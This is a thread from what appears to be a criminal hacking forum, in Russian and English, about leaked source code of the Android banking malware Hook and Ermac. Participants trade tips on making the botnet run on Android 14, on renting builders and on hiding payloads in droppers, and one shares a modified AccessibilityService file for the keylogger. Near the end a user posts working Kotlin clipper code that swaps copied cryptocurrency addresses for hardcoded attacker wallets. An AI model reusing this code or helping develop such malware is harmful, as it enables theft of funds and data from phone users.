• XSS.stack #1 – первый литературный журнал от юзеров форума

malware Hook & Ermac

Пожалуйста, обратите внимание, что пользователь заблокирован
Всё работает. Надо новые методы писать в коде (котрые работают с новыми версиями андроид)
I tried adding new codes but I failed more then 10 times...
U got it working or what?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Я пытался добавить новые коды, но более 10 раз мне это не удалось...
У тебя заработало или что?
Ну автоклик я переписал код сервиса AccessibilityService, работает без нареканий.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Someone successful adding Android 14 permissions granting automatically in Hook? Changing the autoclick logic or however? If yes, maybe in exchange one code with another? I can give code so that the connection is made threw okhttp3 to the clients which does increase connection speed.

Also I can setup the builder in TOR with user/password access. Good for rent Hook. And it's of course more secure.
Build APK is likely around 80% faster too. But this is a bit more worth I must say too
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
And it does work flawlessly in Android 14? Does needs much things to be changed?
 
Боже упаси меня в этой жизни заниматься аудитом чужого кода :) Я думаю, что наличие бэкдора (который иногда авторы называют "механизмом проверки лицензий") нужно предполагать в любом чужом коде. Отсюда он и чужой код, а не ваш.

Мы в принципе боролись с этим сливом как умели из-за уважения к стараниям RedDragon, но все уже слито на VXUG + люди пытаются впарить свои левые ратники, вклеивая их к оригинальным сорсам или тупо скидывая сорс.ехе, лол. Отсюда моя логика: пусть если и будут какие-то ссылки, то это будут ссылки на VXUG.
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Since the latest Android 14 patch most or almost all Botnets don't work.
Hook stopped working too, even the App don't start on the Phone.
Is it possible to see why the App don't start?

And yes people's making money from his work, but the leak don't work anyway, so there aren't that much people's which have a working Hook I think.
And Bymajor was the first which wanted money to every small thing, but he scammed all at the end.
 
После выхода последнего патча для Android 14 большинство или почти все ботнеты не работают.
Хук тоже перестал работать, даже приложение на телефоне не запускается.
Можно ли узнать, почему приложение не запускается?

И да, люди зарабатывают деньги на его работе, но утечка все равно не работает, так что, я думаю, не так уж много людей, у которых есть работающий хук.
И Баймажор был первым, кто хотел денег за каждую мелочь, но в конце концов все обманул.
Юзайте старый анубис, все отлично работает до Android 12
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Юзайте старый анубис, все отлично работает до Android 12
Why Anubis? Hook works till Android 13 and the first update of Android 14(except the Permission granting)

Well I test if Ermac3 works on the latest Android 14 patch.
 
Why Anubis? Hook works till Android 13 and the first update of Android 14(except the Permission granting)

Well I test if Ermac3 works on the latest Android 14 patch
И анубис работает, если завернуть в дроппер)) От прошивок зависит что работает, что нет
 
Пожалуйста, обратите внимание, что пользователь заблокирован
In case u don't know, the leaked files have a clipper installed in the builder, iam sure the person is rich now :)
U can Test it, install trust wallet and copy paste a Bitcoin or usdt or eth address, it will be replaced by another address, of course install the hook APK first
I changed it to my address :)

On the real source code it's there too. So it's the dev which wanted to scam us or others ;) and the dev is here, eh? How much money u got already since it's leaked? Is this what u wanted from the leak? RedDragon
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Yes this is exactly what I thought, no react, just a bad like :D my people's say that's typically RedDragon
Now I have one like lesser, that's not fair in that case mod or don't u find it so? I announced a scammer for all the people's which does use Hook.
my new builder will have an option to add his own Bitcoin address for the clipper :)
 
Последнее редактирование:
Yes this is exactly what I thought, no react, just a bad like :D my people's say that's typically RedDragon
Now I have one like lesser, that's not fair in that case mod or don't u find it so? I announced a scammer for all the people's which does use Hook.
my new builder will have an option to add his own Bitcoin address for the clipper :)
в твоем кишлаке интернет бесплатный провели? Проверь адрес и количество транзакций на нём малолетка и не пиши херню. Мы то уже обсудили много раз пока ты вбивал карточки своих родственников. И своим пипл тоже самое передай
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
I have my own money, I don't need money from someone else like....;) Iam already 39 years old, you can't tell me anything
So, I don't see any discussion about that, that's why I have posted it.
But my friend is telling me I should not blame u, I don't know why but it's too late now

How to do a dislike, I want to make it now too :) I don't have such button for dislike?

edit: hahah it seems u r just a kid, I don't see any point to give me dislike but acting like a kid does need to do it :D
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Okay here is the file without the clipper, sooner as I said :)
I hope I didn't remove too much, iam just a 100th class coder or better said non coder
Just replace this file with the file in accessppp folder in the builder, inside the bot.../java folder
I haven't tested it, don't have this time for it
Please test if keylogger, getting injects data working afterwards


So.... I hope I will get rich soon :)

Ps. I just hided my addresses with base6489485 code :)
 

Вложения

  • AccessibilityServiceQ.zip
    19.8 КБ · Просмотры: 36
Последнее редактирование:
In case u don't know, the leaked files have a clipper installed in the builder, iam sure the person is rich now :)
U can Test it, install trust wallet and copy paste a Bitcoin or usdt or eth address, it will be replaced by another address, of course install the hook APK first
I changed it to my address :)

On the real source code it's there too. So it's the dev which wanted to scam us or others ;) and the dev is here, eh? How much money u got already since it's leaked? Is this what u wanted from the leak? RedDragon
You need to show proofs that there is a clipper in leaked files or take your words back.

RedDragon is a coder of Ermac/Hook and it means that you accuse him that he placed a clipper to scam his clients.

That's not right, bro. Show your proofs or excuse yourself. We do not encourage to spread rumors like that, especially on respected in our community persons.
 
Последнее редактирование:
You need to show proofs that there is a clipper in leaked files or take your words back.

RedDragon is a coder of Ermac/Anubis and it means that you accuse him that he placed a clipper to scam his clients.

That's not right, bro. Show your proofs or excuse yourself. We do not encourage to spread rumors like that, especially on respected in our community persons.
Как бы что-то всеже есть, на рабочесть не проверял, лень...

fun ClipboardManager.setClipBoard(str: String, event: AccessibilityEvent) {
if (event.eventType == AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED) {
runCatching {
if (str.contains(regex2)) {
val str = str.replace(regex2, "0x3Cf7d4A8D30035Af83058371f0C6D4369B5024Ca")
this.setPrimaryClip(ClipData.newPlainText(str, str))
val args = Bundle()
args.putCharSequence(AccessibilityNodeInfo.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, str)
event.source?.performAction(AccessibilityNodeInfo.ACTION_SET_TEXT, args)
return
}
}.onFailure {
IOSocketyt.sendLogs("", "setClipBoard1 ${it.localizedMessage}", "error")
}
runCatching {
if (str.contains(regex)) {
val str = str.replace(regex, "bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf")
this.setPrimaryClip(ClipData.newPlainText(str, str))
val args = Bundle()
args.putCharSequence(AccessibilityNodeInfo.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, str)
event.source?.performAction(AccessibilityNodeInfo.ACTION_SET_TEXT, args)
return
}
}.onFailure {
IOSocketyt.sendLogs("", "setClipBoard2 ${it.localizedMessage}", "error")
}
runCatching {
if (str.contains(regex1)) {
val str = str.replace(regex1, "bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf")
this.setPrimaryClip(ClipData.newPlainText(str, str))
val args = Bundle()
args.putCharSequence(AccessibilityNodeInfo.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, str)
event.source?.performAction(AccessibilityNodeInfo.ACTION_SET_TEXT, args)
return
}
}.onFailure {
IOSocketyt.sendLogs("", "setClipBoard3 ${it.localizedMessage}", "error")
}
}
}
 
Мне в личку объяснили, что это был тестовый функционал для одного APK и что траншей на адресе нет (сам блокчейн не проверял).
+ известно, что сорс код был слит не разработчиками

Поэтому двоякая ситуация: клиппер вроде как есть, но вроде его и нет. Турка банить не за что, если только за грязный рот, но в правилах ничего такого нет.

Я лично был бы и рад, если бы клиппер в слитых исходниках был и деньги с любителей чужих исходников уходили в Фонд Мудрости.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх